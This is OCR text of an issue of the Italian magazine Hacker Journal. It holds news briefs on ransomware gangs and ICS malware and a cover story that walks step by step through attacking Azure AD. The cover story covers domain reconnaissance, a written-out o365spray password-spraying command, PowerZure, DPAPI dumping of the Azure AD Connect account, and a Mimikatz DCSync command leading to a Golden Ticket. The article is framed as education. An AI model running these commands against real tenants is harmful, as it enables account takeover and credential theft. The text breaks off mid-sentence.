MALWARE

maggio

DA CYBERGUERRA
N.262

L’analisi dettagliata dei tool distruttivi

usati dalla Russia per attaccare l’Ucraina
www.hackerjournal.it

Dal 2002 tutto quello che gli altri non osano dirti

L’offuscamento

s
ha fallito

ew
Usi la pixellatura o
la sfocatura per nascondere
i tuoi segreti? È tutto inutile!
_n
Sgama
TARIFFA R.O.C. Poste Italiane S.p.A. – spedizione in abbonamento postale – MBPA/LO-NO/125/A.P./2017- ART.1 COMMA1- S /NA

i numeri nascosti
lia

Il trucco per scoprire l’identità

di chi ti telefona con l’anonimo

Annichilire
ita

il cloud
@

Le tecniche dei cybercriminali per identificare e bucare le istanze

L’hacker di Azure, la nuvola di Microsoft, e impossessarsi dei nostri dati
folle senza
un dito
La storia del criminale
russo che ha diffuso
Gigabyte di dati
pentesting
Scopri lo script usato dai pirati per
accesso (in)sicuro
L’autenticazione a due fattori
sottratti con il enumerare gli utenti di un server è a prova di cracker... Ops, no.
ransomware bucato con il log poisoning L’hanno bucata ed è colpa tua
 IN EDICOLA
DAL 19 APRILE

s
ew
_n
lia
ita
@

Scansiona il QR Code

Acquistala su www.sprea.it/glorierock
versione digitale disponibile dal 16 aprile
 EDITORIALE
www.hackerjournal.it
In questo numero parliamo di:
Microsoft Azure, reverse shell,
tracciamento degli smartphone,
malware, wiper, ransomware, debolezze
della doppia autenticazione, pixelling,
telefonate moleste e molto altro.

s
P
romozione della sicurezza informatica.

ew
Ne ha parlato anche il Presidente della
Repubblica, Sergio Mattarella, in un
messaggio inviato al Prefetto Lamberto
Giannini, Capo della Polizia, in occasione del 170°
_n
anniversario di fondazione della Polizia.
Nell’epoca che stiamo vivendo, nella quale
il cambiamento tecnologico e socioeconomico sembra
lia

procedere a una velocità pazzesca, forse anche

eccessiva, la sicurezza informatica gioca un ruolo
chiave perché il digitale ormai tocca anche chi usa
ancora un feature phone e il green pass lo vuole solo
ita

su carta. Il digitale è ovunque, eppure di strada dal

punto di vista culturale per capire come blindare
strumenti e dati personali ne dobbiamo fare ancora CONTATTI
@

tanta, ma davvero tanta. Un esempio? Come ci ha

REDAZIONE
svelato l’esperto di sicurezza Matteo Flora in un video
[email protected]
(www.youtube.com/watch?v=o7lg4IEOuvk), il
ABBONAMENTI
Ministero della Salute ha commesso una “leggerezza” E ARRETRATI
[email protected]
diffondendo una circolare contenente un link a un www.sprea.it/digital
form di segnalazione dei posti letto occupati per
FACEBOOK
Covid19 che, invece di essere compilabile solo da www.facebook.com/
hackerjournal/
ospedali e simili, era alla mercé di chiunque avesse
quel link... Non ci resta che augurarvi buona lettura. SITO WEB
www.hackerjournal.it
 Il prossimo num ero sara
o
in edicola dal 3 giugn

SOMMARIO ABBONATI ALLA

VERSIONE DIGITALE
SOLO PER PC E MAC
A SOLI 19,90 €
DURATA ABBONAMENTO: 1 ANNO

s
www.hackerjournal.it/abbonamenti

ew
HACKTUALITÀ
News
Notizie e anticipazioni dell’universo hacker................................................................ 06
_n
COVER STORY
Annichilire il cloud
Le tecniche dei cybercriminali per identificare e bucare le istanze
lia

di Azure, la nuvola di Microsoft, e impossessarsi dei tuoi dati.............................. 10

Vulnerabilità | Una reverse shell dai log

ita

Il bug Log4Shell consente a chiunque di prendere il controllo di una macchina

su cui è presente un applicativo Java..............................................................................18
@

NOI RISPETTIAMO L’AMBIENTE!

Hacker Journal è stato stampato
su carta certificata PEFC, proveniente
da piantumazioni a riforestazione programmata
e perciò gestite in maniera sostenibile

M IGL IORARE
A
P
I
RU
ETA
F
C
E I
R A
I TA!
A T UA R I V ISTA
L .ly/hackerjo
://bit
urnal
Vai su https questionario anonimo
e compila il
4
 Il primo manifesto hacker
“... avete mai guardato dietro agli occhi dell’hacker?
Vi siete mai chiesti cosa lo stimola, che forze
lo hanno formato, cosa può averlo forgiato?
Io sono un hacker, entra nel mio mondo...”

Wiper

s
SICUREZZA

ew
Sorveglianza Wi-Fi | Monitorati e schedati
Seconda parte del progetto di creazione di un tracciatore per smartphone.... 22

Wiper | Nuovi malware da cyberguerra

Analisi dettagliata dei tool distruttivi usati dalla Russia per attaccare l’Ucraina..... 26
_n
2FA | la doppia autenticazione è bacata
Un attacco che sta colpendo molti utenti in Rete e che causa danni gravi........... 34 > 26
Pentesting | Attacco a dizionario
Progettiamo un dictionary attack calibrato su una Web app reale!................. 36
lia

44
HOW TO
ita

Pixelling | Testi pixellati, ora craccati!

Proteggere i propri segreti pixellando le immagini non è più un metodo sicuro.... 44

Scocciatori | Come rendere visibile un numero privato

Ecco il modo per “smascherare” chi effettua telefonate con il prefisso #31#....... 48

PIXELLING
@

Filesystem | Alla scoperta di NTFS, terza parte

Vediamo come il filesystem NTFS, tipico di Windows, conserva i file....................... 52

> 58
HACKULTURE
Hack e follia | L’hacker folle senza anulare
Dietro al nick Wazawaka si cela uno dei più importanti criminali nell’ambito
del ransomware che adesso sembra essere completamente impazzito............... 58

tt o ri , le risposte de lla redazione > 60

Le do m a n d e d e i le
POSTA
HACKTUALITÀ

NLETETURW
E
S Quando hacke
rano

s
li...
i cybercrimina

ew
#LEAK Su Twitter sono finiti documenti interni e chat della gang
ransomware Conti. Ora sappiamo quali strumenti usano

C on un fatturato stimato di quasi 200 milioni di dollari, la gang Conti,

_n
specializzata in attacchi basati su ransomware, è uno dei gruppi di
cybercriminali più attivi negli ultimi anni. Scoperta nel 2020, questa gang
sembrerebbe operare dalla Russia. Ebbene, dopo aver colpito decine
e decine di obiettivi, sono caduti loro stessi vittima di un ricercatore
ucraino indipendente (o forse di un leak interno), come indica un’analisi
effettuata dagli esperti di Akamai Security. Difatti, il 27 febbraio 2022
lia

è stato creato il profilo Twitter @contileaks che ha iniziato a diffondere

documenti interni e log di chat del gruppo, così come gli indirizzi di alcuni
dei loro server interni e il codice sorgente dei tool che utilizzano.
PRACTICAL HARDWARE
Scopriamo così che per raggiungere i suoi obiettivi, la gang Conti ricorre
PENTESTING
a vari strumenti, la maggior parte dei quali non è di sua produzione. Solo
ita

Abbandoniamo per una volta
il mondo del software
per dedicarci all’attacco
dell’hardware. È ciò che
impareremo leggendo questo
volume di 382 pagine, divise
@
crypter, trojan e injector sembrano essere proprietari; per il movimento
laterale, la propagazione e l’esfiltrazione sembra invece usare una serie
di strumenti che dovrebbero essere familiari a chiunque sia nei red e blue
team: Cobalt Strike, Mimikatz e PSExec, per citarne alcuni. Sono stati
diffusi anche manuali con esempi concreti e guide sull’implementazione

del movimento laterale e tante altre informazioni sul loro modo di operare.
in 14 capitoli e in lingua
inglese. Scopriremo come
identificare ogni singolo
componente di un dispositivo
hardware, costruiremo pezzo
per pezzo un laboratorio
per eseguire il pentest in
sicurezza e poi inizieremo
ad hackerare protocolli
hardware, firmware, porte,
interfacce di debug e tanto
altro. Infine capiremo anche
come realizzare un report
sulle vulnerabilità trovate.
https://amzn.to/3EegIEE

6

Attacco remoto contro
le stampanti HP
#BUG Sono usciti alcuni CVE relativi a dispositivi di stampa
buggati dell’azienda americana
H P ha pubblicato alcuni avvisi di
sicurezza per delle vulnerabilità di
gravità critica che interessano centinaia
di modelli di stampanti LaserJet Pro,
Pagewide Pro, OfficeJet, Enterprise,
Large Format e DeskJet. Il primo
bollettino avverte di un bug di buffer
overflow che potrebbe portare
ew
all’esecuzione di codice in modalità remota
sul computer interessato. Tracciato come
CVE-2022-3942, il problema è stato segnalato
dal team Zero Day Initiative di Trend Micro.
“Alcuni prodotti HP Print e Digital Sending possono essere vulnerabili
alla potenziale esecuzione di codice in modalità remota e al buffer
_n
overflow con l’uso di Link-Local Multicast Name Resolution”, si legge
nell’avviso (https://bit.ly/hj262_hp).
Il malware
lia
che abbatte le
infrastr utture
ita
critiche
@
#MINACCIA Mandiant presenta una nuova
ricerca su un insieme di strumenti di “attacco
informatico eccezionalmente rari e pericolosi”,
denominati “INCONTROLLER”
INCONTROLLER, questo è il malevolo protagonista
della ricerca che Mandiant ha pubblicato all’URL
https://www.mandiant.com/resources/incontroller-
state-sponsored-ics-tool. Questa soluzione include
tre strumenti che consentono all’attaccante di inviare
istruzioni a una varietà di diversi dispositivi inerenti
al sistema di controllo industriale (ICS), incorporati
NEWS
Hanno chiuso
IL FORUM
DEI CRACKER
#SEQUESTRO Dopo anni
di attività, il noto RaidForums
è stato blindato dalle autorità
L
e forze dell’ordine statunitensi
ed europee hanno preso
il controllo di un popolare forum
s
in cui gli hacker hanno pubblicizzato
per anni dati rubati a consumatori
e aziende americane e internazionali.
Il dominio è stato sequestrato dall’FBI,
dai servizi segreti, dal dipartimento
di giustizia degli Stati Uniti e da altre
forze dell’ordine, come si legge
in un avviso apparso sulla homepage
di RaidForums e nel comunicato
all’URL https://bit.ly/hj262_forum.
Questo forum underground, nato
nel 2015, era noto per il suo mercato
dei leak ed era, a quanto pare,
amministrato da un ragazzo
di ventuno anni, portoghese.
in differenti tipologie di macchinari in diverse industrie
critiche (per esempio le centrali elettriche, fresatrici,
presse industriali utilizzate in molti differenti settori
produttivi, ecc). È possibile che ogni strumento possa
essere utilizzato indipendentemente, o che l’attaccante
possa utilizzare i tre strumenti insieme per attaccare
un singolo ambiente. L’autore della ricerca evidenzia
che la funzionalità di INCONTROLLER “è coerente con
il malware utilizzato nei precedenti attacchi informatici
da parte della Russia”.
7
HACKTUALITÀ

REVIL È KO?
BEH, ORA C’È
BLACKCAT

s
#RANSOM Un nuovo
gruppo di cybercriminali

ew
è nato dalle ceneri
di BlackMatter e REvil

N el nuovo report A bad luck BlackCat, i ricercatori di Kaspersky rivelano i dettagli di due incidenti cyber
condotti dal gruppo di criminali informatici ransomware BlackCat. La complessità del malware utilizzato,
unita alla vasta esperienza degli attori coinvolti, ha trasformato questo nuovo gruppo in uno dei player più
influenti nell’attuale mercato dei ransomware. Tecniche e strumenti usati dal gruppo durante gli attacchi
_n
confermano il collegamento tra BlackCat e altri gruppi noti come BlackMatter e REvil. In uno dei casi rivelati nel
report, il gruppo criminale ha attaccato i sistemi cloud delle vittime sfruttando le vulnerabilità degli asset condivisi
online. Inoltre, in questo caso, il gruppo ha anche rilasciato un file batch Mimikatz, insieme a file eseguibili e utility
di recupero password di rete Nirsoft. Insomma, come spieghiamo nell’articolo di copertina di questo numero,
il cloud è da maneggiare con molta cura. Per informazioni: https://securelist.com/a-bad-luck-blackcat/106254/
lia

O V E L O C I C O N LA PANDEMIA
N
LE FRODI CORRO
ita

#REPORT Uno studio di Kroll ha registrato un forte incremento

del phishing e delle frodi informatiche durante la pandemia

Kroll (www.kroll.com) ha presentato un nuovo report realizzato in

@

collaborazione con The Internal Audit Foundation (IAF) e The Institute

of Internal Auditors (IIA). Lo studio, intitolato “Le frodi e la pandemia
– L’audit interno evolve per affrontare la sfida” (https://bit.ly/
hj262_kroll), riporta che il cambiamento delle modalità di lavoro
e il passaggio improvviso al lavoro da remoto hanno fornito nuove
opportunità a truffatori e criminali informatici. Le organizzazioni
hanno dovuto affrontare una maggiore esposizione ad attacchi
informatici, di social engineering e di phishing, nonché a casi di furti
d’identità di alti dirigenti al fine di appropriarsi indebitamente di fondi.
Negli ultimi due anni, oltre la metà (il 54%) degli intervistati ha notato
un aumento degli attacchi informatici e di truffe tramite phishing,
mentre il 40% ha registrato un aumento delle frodi relative
all’appropriazione indebita di beni aziendali.

8
 s
ew
_n
lia

HA C K T U A L I TA À
ita

cover story
@

Annichilire il cloud
Le tecniche dei cybercriminali per identificare e bucare le istanze
di Azure, la nuvola di Microsoft, e impossessarsi dei nostri dati...................................................... 10

Vulnerabilita Una reverse shell dai log

Il bug Log4Shell consente a chiunque di prendere il controllo di una macchina
su cui è presente un applicativo Java....................................................................................................... 18
 HACKTUALITÀ ud
hilire il clo
COVER STORY: Annic

Annichilire
il cloud
GLOSSARIO
DI BASE
SOC
Il Security Operations Center
è un centro da cui vengono

s
forniti servizi finalizzati
alla sicurezza dei sistemi
Le tecniche dei cybercriminali per
informativi dell’azienda stessa
identificare e bucare le istanze

ew
(si dice che il SOC è interno)
o di clienti esterni. In questo
secondo caso il SOC è usato
di Azure, la nuvola di Microsoft,
per erogare Managed
Security Services (MSS)
e impossessarsi dei nostri dati
e l’azienda che li eroga è
chiamata Managed Security
_n
Service Provider (MSSP).

DOMAIN CONTROLLER
È il server che si occupa delle
richieste di autenticazione
all’interno di un dato dominio.
lia

DOMINIO
Un dominio è una rete di
computer, di solito una LAN di
un’organizzazione (azienda,
ita

ente pubblico, scuola/

università), nella quale
la logica client-server
è supportata, oltre che da
connessioni fisiche e relativi
protocolli, anche da regole
@

(dette policy) di connessione

logica di tipo autorizzativo
(regole di sicurezza).

IAAS
Infrastructure as a Service
è un’attività in cui un fornitore
di servizi informatici permette
agli utenti di creare piani
personalizzati per la creazione
di un’infrastruttura cloud
dinamica e scalabile che
comprende risorse di calcolo,
CPU, RAM, connessioni
di rete, dischi e tutto ciò che
In collaborazione con
è necessario per la creazione
di macchine virtuali. thehackingquest.net

10
 Scegliere una soluzione cloud a volte vuol dire
preferire la comodità alla sicurezza e alla privacy.
E forse alla lunga lo si paga se i sistemi non sono
“blindati” in modo adeguato...
O
rmai la moda del cloud
è uno stile IT sdoganato in tutto
il mondo. Il termine significa
“nuvola” e identifica una rete
informatica che mette a disposizione
innumerevoli servizi attraverso la rete
Internet, disponibili da remoto sotto forma
di architettura distribuita. Contrariamente
a quanto si pensa, il cloud computing non
è così recente. I primi “Comunicator” erano
terminali dotati solo di schermo e tastiera
dove i dati venivano inviati a un centro
di calcolo remoto [figura #1].
_n
IL CLOUD HA I NOSTRI DATI
Il buon senso dovrebbe guidarci su un
semplice paradigma: “I miei dati sono
in mano a sconosciuti”. A oggi, la maggior
parte dei nostri dati è in mano a
lia
“sconosciuti”: chiamate, foto, posizioni,
agende, appuntamenti, spostamenti, numero
di volte in cui clicchiamo sullo schermo,
perfino ciò che si dice finisce sul cloud
e dato in pasto alle IA che ci profilano per poi
ita
proporci le più svariate pubblicità. Persino
aziende di cyber sicurezza pagano stati esteri
per fare da SOC ad aziende italiane,
figura #1
@
ma poiché servono sempre il “dio denaro”,
sono destinate a restare sempre un passo
indietro, azzoppate dagli idoli che loro stesse
servono e venerano. La verità è che anche
molti esperti del settore tendono a credere
s
che sia possibile demandare a terzi la
gestione della propria infrastruttura non
dovendosi preoccupare, per esempio, di tutti
ew
quei problemi tecnici legati alla cyber
sicurezza. Generalmente “non assumersi le
proprie responsabilità” non è mai una grande
idea. Non dico che il cloud sia di per sé
sbagliato, dico solo che andrebbe utilizzato
attentamente applicando ancora più
accortezze di quante ne useremmo
per il nostro ambiente “on-premises”.
KERBEROS
Il protocollo di autenticazione di Microsoft
fu sviluppato al Massachusetts Institute
of Technology (MIT) e prende il nome dal
mitologico mastino a tre teste a guardia
dell’ingresso degli inferi, su cui regnava
il dio Ade. Ognuna delle teste era in grado
di scorgere il passato, il presente e il futuro.
Il protocollo consente a due parti (per
esempio un client e un server) di autenticarsi
a vicenda su un canale di rete non
sicuro. Entrambe le parti coinvolte
fanno riferimento a una terza
parte che fa da “garante” tra le
due: il server Kerberos. Da qui
il nome del protocollo che vede
coinvolte tre parti:
• il KDC (Key Distribution Center);
• il client che richiede l’accesso;
• il servizio di cui il client sta
tentando di ottenere l’accesso.
Ecco un terminale DEC VT100, collegato “in remoto”
al computer vero e proprio, introdotto nel mercato
nel 1978. Fonte: https://it.wikipedia.org/wiki/
Terminale_(informatica)
11
 HACKTUALITÀ
hilire il clo
COVER STORY: Annic
GLOSSARIO
DI BASE
SAAS
Software as a Service
è un modello di servizio
del software applicativo dove
un produttore di software
sviluppa, opera e gestisce
un’applicazione Web,
mettendola a disposizione dei
propri clienti via Internet (con
una formula di abbonamento).
RECORD TXT
Un record TXT è un tipo
di record DNS usato per
associare del testo arbitrario
a un hostname, come
informazioni su un server,
una rete, un centro dati o altre
informazioni contabili.
RECORD MX
Un Mail eXchanger record è
un tipo di risorsa nel DNS che
specifica un server di posta
elettronica autorizzato ad
accettare messaggi email
per conto del dominio
di destinazione.
ita
AZURE AD CONNECT
Applicazione Microsoft
che consente di “unire”
la gestione dell’identità
dell’utente on-premise e sul
@
cloud. In pratica, tra le altre
cose, sincronizza gli hash
delle password tra un’Active
Directory locale e quella
sul cloud, sincronizza
gruppi, utenti, ecc.
DPAPI
Data Protection API è una
semplice interfaccia
di programmazione di
applicazioni crittografiche
disponibile come componente
integrato in Windows 2000
e versioni successive
dei sistemi operativi
Microsoft Windows.
12
ud
Schema di
funzionamento di
massima di un
Domain
Controller.
figura #2
s
FLUSSO DI AUTENTICAZIONE soddisfa certi requisiti, lo ottiene e lo
ew
Il “garante” che abbiamo citato in ripresenta al “garante” assieme alla
precedenza, in un’infrastruttura richiesta del servizio a cui desidera
di rete è rappresentato dal Domain accedere. Il garante gli risponde
Controller (DC). Per assolvere al suo fornendogli un lasciapassare
scopo il DC ottempera anche altri (Service Ticket) che potrà utilizzare
ruoli: Authentication Server (AS) per autenticarsi al servizio. Il sistema
_n
e Ticket Granting Service (TGS). centralizzato, cuore di Windows
Vediamo adesso quale è il flusso Server, che si fonda sui concetti di
di autenticazione [figura #2]. Dominio e di Directory e che poggia
1 Il Client invia una richiesta di le sue fondamenta sull’autenticazione
ticket-granting-ticket (TGT) all’AS. Kerberos, è chiamato Active
lia
La richiesta contiene: timestamp Directory. Azure Active Directory
criptato più hash NT dell’utente. (Azure AD) è il servizio in cloud
2 Se l’AS decripta il messaggio, di Active Directory basato su IaaS
invia al client il TGT. (Infrastructure as a Service). Creiamo
3 Il client, una volta ottenuto il TGT, adesso il nostro ambiente Azure.
può inviare al TGS il suo TGT
più il dettaglio del servizio REGISTRAZIONE
a cui vuole accedere. Prima di impostare il nostro
4 Il TGS risponde con il Service Ticket ambiente Azure AD, è necessario
più la Session Key. registrarsi al seguente link: https://
5 Il client adesso può autenticarsi azure.microsoft.com/en-us/free/
utilizzando
il Service Ticket.
In poche parole, figura #3
il client chiede
al “garante”
un biglietto di
riconoscimento
(TGT). Se il client
Il primo passo
nella creazione del
nostro tenant
 figura #4 figura #5

Controlliamo i dati inseriti

e premiamo Create se sono

s
tutti corretti. Creeremo così
Schema di funzionamento di un attacco Password
il nostro tenant.
Spray, pensato per non mandare in blocco la

ew
procedura di login del servizio attaccato.

cliccando su Start Free. Clicchiamo poi su
Create Account. Una volta loggati con il nostro
account, ci ritroveremo di fronte alla schermata
Create Your Azure free account dove
_n
dovremo compilare i vari campi.
CREAZIONE DI UN NUOVO TENANT
Un tenant Azure AD è un’istanza specifica di
Azure AD che include account e gruppi.
lia
le informazioni contenute nei record TXT e MX.
Microsoft ha due opzioni per validare il dominio.
1 Un TXT record che contiene il valore
MS=<numero a caso> con un TTL di 3.600 secondi.
2 Un MX record con priorità alta: ms<numero a
caso>.msv1.invalid con un TTL di 3.600 secondi.
Nel nostro caso, la data organizzazione utilizza
Azure AD con applicazioni Software as a Service
(SaaS). L’attaccante può verificarlo dai record

1 Nel menu di ricerca digitiamo Azure Active
Directory e clicchiamo su Create [figura #3]
2 Nel menu Configuration inseriamo:
• il nome dell’Organizzazione: hack3rjournal
• il nome del nostro Dominio: hackerjournal
ita
MX e TXT del DNS o dai “federation records”
come: adfs.targetdomain.com, sso.
targetdomain.com, sts.targetdomain.com.
I campi che dovremo cercare e che indicano la
presenza di Azure AD sono, per esempio:

• infine la regione: Italy

3 Spostiamoci nella scheda Review + Create
e confermiamo i dati, selezionando il pulsante figura #6
Create in basso a sinistra [figura #4].
Complimenti, abbiamo appena creato il nostro
@

primo tenant di Azure AD! Per crearlo abbiamo

usato il dominio hack3rjournaloutlook.
onmicrosoft.com.

AZURE RECONNAISSANCE
Supponiamo adesso che il nostro obiettivo sia
attaccare il dominio appena creato. Una delle
fasi più importanti di un attacco è la raccolta di
informazioni sul target. Abbiamo appena visto
che impostando un tenant di Azure AD viene
creato automaticamente il dominio <nome del
tenant>.onmicrosoft.com. Il primo passo sarà
quello di richiedere i record DNS e identificare Lo script per l’attacco alle password in esecuzione.

13
 HACKTUALITÀ ud
hilire il clo
COVER STORY: Annic
• il record *.mail.protection.outlook.com;
• il record MS=ms76565273.
Ma c’è un altro modo per verificare se una data
organizzazione sta utilizzando Azure: possiamo
navigare all’URL https://login.microsoftonline.
com/getuserrealm.srf?login=user@
<domain>&xml=1. Lo username può essere
_n
quello che desideriamo e dobbiamo solamente
sostituire all’interno dell’URL il campo <domain>
con il nome del dominio della nostra vittima.
Per esempio: hac3rjournal.edu. Una volta che
avremo premuto Invio, ci apparirà la pagina
lia
corrispondente con le seguenti informazioni:
<RealmInfo Success=”true”>
<State>6</State>
ita
<UserState>2</UserState>
<Login>[email protected]</ per questo tipo di attacco. Le campagne di
Login>
<NameSpaceType>Managed</NameSpaceType>
<DomainName>hac3rjournal.edu</DomainName>
@
<IsFederatedNS>false</IsFederatedNS>
<FederationBrandName>HACKER JOURNAL FAKE
SPA</FederationBrandName>
<CloudInstanceName>microsoftonline.com</
CloudInstanceName>
<CloudInstanceIssuerUri>urn:federation:
MicrosoftOnline</CloudInstanceIssuerUri>
</RealmInfo>
Il campo che a noi interessa è il valore Managed
per il <NameSpaceType> che indica la presenza
di Azure AD e O365, che sta per Office 365 (altre
opzioni sono “Unknow” o “Federation”). Constatato
che l’organizzazione utilizza Azure AD, potremo
optare per un attacco Password Spraying.
14
figura #7
Schermata
di login della
macchina
attaccata.
s
ATTACCO ALLE PASSWORD
ew
Un brute-force attack cerca di ottenere un
accesso non autorizzato di un singolo account
facendo “guessing” della password, cioè cercando
di indovinarla. Questo approccio è inutilizzabile
poiché l’account sarebbe bloccato dopo un certo
numero di tentativi, che variano solitamente da
tre a cinque (e ne dovremmo fare molti di più).
Adottiamo un altro punto di vista: in un attacco di
tipologia “spray” proviamo una singola password
su molteplici account, e poi passiamo alla
successiva della lista. Questo attacco ci permette
di evitare frequenti e continui blocchi dell’account,
in quanto viene eseguito un singolo tentativo di
accesso per ogni utente. Dato che gli ambienti
cloud espongono pubblicamente i loro portali di
login, questi rappresentano un ottimo bersaglio
Password Spray prendono come target le Single-
Sign (SSO) e le applicazioni cloud che utilizzano
i protocolli di “federated-authentication”.
figura #8
Il logo di PowerZure, un tool PowerShell creato
per exploitare le risorse presenti su Microsoft
Azure.
USER ENUMERATION
La prima cosa da fare sarà quindi quella di
procurarci una lista di utenti su cui mettere
a segno il nostro Spray Attack. Per farlo abbiamo
diverse opzioni: una è quella di ottenere una lista
di dipendenti attraverso l’utilizzo di classiche
tecniche di OSINT (per esempio sfruttando
LinkedIn) e poi determinare il criterio con cui
l’organizzazione crea le sue email, come nome.
[email protected] oppure prima-lettera-
[email protected] [figura #5]. ricognizione; uno è quello di utilizzare uno script
ATTACK!
Una volta che la lista delle email target è pronta,
non ci resta che utilizzare uno script per portare
l’attacco. In questo esempio utilizzeremo
o365spray. Lo script in Python è scaricabile
su GitHub al seguente indirizzo: https://github.
com/0xZDH/o365spray. Per eseguirlo dovremo
_n
dare allo script i permessi di esecuzione,
utilizzando il comando
chmod +x o365spray.py
lia
Adesso potremo lanciare il nostro comando:
./o365spray.py --spray -U usernames.txt -p
Pass123! --count 2 --lockout 5 --domain
ita
dominio.edu
Analizziamo il comando nel dettaglio [figura #6].
• ./o365spray.py: lanciamo il nostro script.
• --spray: scegliamo l’opzione per lanciare uno
Spray Attack.
@
• -U usernames.txt: la lista dei nostri username.
Le email degli utenti che abbiamo raccolto
precedentemente.
• -p Pass123!: la singola password che vogliamo
provare su tutti gli account.
• --count 2: il numero dei tentativi che vogliamo
effettuare (2).
• --lockout 5: Reset Time per la Lockout Policy,
Questa panoramica sulle tecniche d’attacco al cloud
è solo a scopo didattico. Attaccare sistemi altrui
senza permesso è reato, fate attenzione!
in minuti (5).
• --domain dominio.edu: il dominio che
vogliamo attaccare.
Una volta che avremo ottenuto le credenziali
di accesso al dominio, potremo decidere di
utilizzare vari tool per effettuare una ricognizione
interna della sua struttura.
AUTHENTICATED RECONNAISSANCE
Esistono diversi modi per effettuare la nostra
s
PowerShell che carpisce le user info, group
membership e company information.
ew
La prima cosa che dovremo fare per utilizzarlo
è installare i moduli MsOnline. Apriamo
PowerShell con i privilegi di amministratore
e digitiamo i seguenti comandi:
Install-Module MSOnline
Install-Module -Name AzureAD
Una volta che i nostri moduli saranno installati,
scarichiamo il tool da GitHub al link https://github.
com/nyxgeek/o365recon. Estraiamolo in una
directory a scelta e, utilizzando sempre la nostra
Command Line Interface (CLI) di PowerShell,
navighiamo nella directory nella quale è presente
lo script. Avviamolo digitando il nome dello script,
preceduto da .\. Dopo un breve check dei moduli
installati da parte dello script, ci apparirà
la schermata di login [figura #7].
POST-EXPLOITATION
Effettuata la nostra ricognizione, dovremo
eseguire tutte quelle attività di pivoting
ed escalation (cioè spostarsi nella rete locale
e ottenere maggiori privilegi) necessarie per
raggiungere il nostro obiettivo. In questa fase
ci viene incontro PowerZure che ci aiuta a
identificare misconfiguration o privilegi non
assegnati correttamente. Le sue funzioni sono:
• Mandatory - operazioni da effettuare per prime;
15
 HACKTUALITÀ ud
hilire il clo
COVER STORY: Annic

figura #9
Scopriamo su quale macchina è in esecuzione
Azure AD Connect.

attack”. Quindi il nostro primo step sarà quello di

identificare su quale server è installato Azure AD
Connect: per farlo dobbiamo localizzare
l’account di sincronizzazione, denominato da
Microsoft MSOL_nnnnnnnnnn. Il campo

s
“Description” dell’account identifica la macchina
su cui è in esecuzione Azure AD Connect [figura
#9]. Ci basterà quindi utilizzare il seguente

ew
comando, sfruttando il modulo di PowerShell
AD, per estrapolare il campo “Description”:

Get-ADUser -filter ‘name -like “Msol*”’

-Properties Description
_n
Il nostro secondo passo nell’attacco sarà quello
• Operational - funzioni che innescano processi di recuperare la password dell’account di
su Azure; sincronizzazione dal Credential Manager
• Information Gathering - raccolta d’informazioni; e decriptarla con le chiavi DPAPI (metodo
• Secret Gathering - funzioni con l’obiettivo di crittografia utilizzato per i dati che non
lia

di collezionare informazioni categorizzate vengono mai letti al di fuori dell’host che la

come “secret”; utilizza), per farlo abbiamo due possibilità:
• Data Exfiltration - funzioni per esfiltrare/ 1 Utilizzare uno script in PowerShell:
estrarre dati. https://gist.github.com/xpn/
È possibile scaricare PowerZure al seguente link: f12b145dba16c2eebdd1c6829267b90c
ita

https://github.com/hausec/PowerZure [figura 2 Utilizzare il tool adconnectdumo:

#8]. In molti credono che una volta penetrati
all’interno di un sistema, l’attacco sia terminato.
In realtà siamo solo all’inizio. Vediamo adesso una
delle possibili strategie d’attacco che possiamo
@
https://github.com/fox-it/adconnectdump
Entrambi sfruttano le chiavi DPAPI dal server
per la decriptazione. L’ultimo nostro passo sarà

impiegare per prendere il controllo completo e

mantenere la persistenza all’interno di Azure AD,
che ci permette di introdurre diversi concetti.

DCSYNC – ATTACKING PHS

L’attacco DCSync sfrutta il protocollo di replica
fra i domini per “imitare” il Domain Controller.
Se l’attacco ha successo, tutte le password nel
dominio sono compromesse. Il Password Hash
Synchronization (PHS) è l’account usato da Azure
AD Connect per sincronizzare la password hash
dell’Active Directory on-premises con quella
figura #10
Abbiamo ottenuto le credenziali d’amministratore
di Azure AD. Riuscendo a prendere il controllo dell’AD di Azure… e con esse otteniamo il modo
di questo account possiamo attuare il “DCSync di entrare in ogni servizio della rete.

16
quello di sfruttare il tool Mimikatz per l’attacco
di DCSync. Mimikatz è un tool Open Source
creato da Benjamin Delpy per dimostrare le
vulnerabilità del protocollo di autenticazione
di Microsoft. Fu creato nel 2007 ma è tutt’ora
un’arma efficacissima. Solitamente in una
struttura Active Directory, gli amministratori
di sistema configurano più di un Domain
Controller. Ognuno di essi possiede una copia
del database dell’Active Directory. Ogni
aggiornamento fatto all’interno del database
(tipo la creazione di un utente) deve essere
propagato fra gli altri Domain Controller.
L’insieme delle metodologie e dei protocolli
utilizzati per sincronizzare tale database prende
il nome di Active Directory Replication.
Il seguente comando di Mimikatz (senza
opzioni extra) seleziona automaticamente
il dominio e il Domain Controller, ed estrae
_n
le credenziali dal Domain Controller attraverso
il protocollo di replica chiamato Directory
Replication Service Remote (DRSR).
mimikatz “kerberos::dcsync
lia
/user:administrator”
A questo punto, il gioco è fatto poiché una volta
ottenute le credenziali dell’amministratore di
dominio, possiamo usare DCSync per connetterci
ita
al Domain Controller ed estrarre le credenziali
@
“madri” del sistema di autenticazione Kerberos.
I dati possono essere utilizzati per creare un
Ticket Granting Ticket (TGT) “speciale”, chiamato
Golden Ticket. Il Golden Ticket prende il nome
dal film “La Fabbrica di Cioccolato” ed è il
biglietto d’oro che permette l’accesso completo
a tutte le meraviglie della Fabbrica.
Analogamente nell’Active Directory il Golden
Ticket è la “matrice” di tutti i Ticket che ci
permette di utilizzare i permessi massimi per il
s
massimo tempo, compromettendo l’account di
sistema denominato krbtgt. Quando l’attaccante
utilizza il Golden Ticket, la prima interazione è
ew
una richiesta per ottenere il “Service Ticket” (fare
riferimento alla [figura #1]) denominata TGS-
REQ utilizzando il “Gold-Ticket Granting Ticket”.
Non avviene alcun invio di credenziali o AS-REQ/
AS-REP. In altre parole, equivale a presentarsi al
nostro “garante” (il Domain Controller) dicendo:
“Guarda il biglietto che possiedo: è quello con
i più alti permessi! Forniscimi quindi l’accesso
al servizio che desidero” [figura #10]. Finalmente
abbiamo compromesso il dominio e assicuratoci
il pieno controllo! Ma questo non è che solo un
assaggio degli attacchi che potremmo mettere
in atto per prendere il controllo e mantenere
la persistenza all’interno di Azure AD. Molti altri
attacchi sono possibili: Skeleton Key, Silver
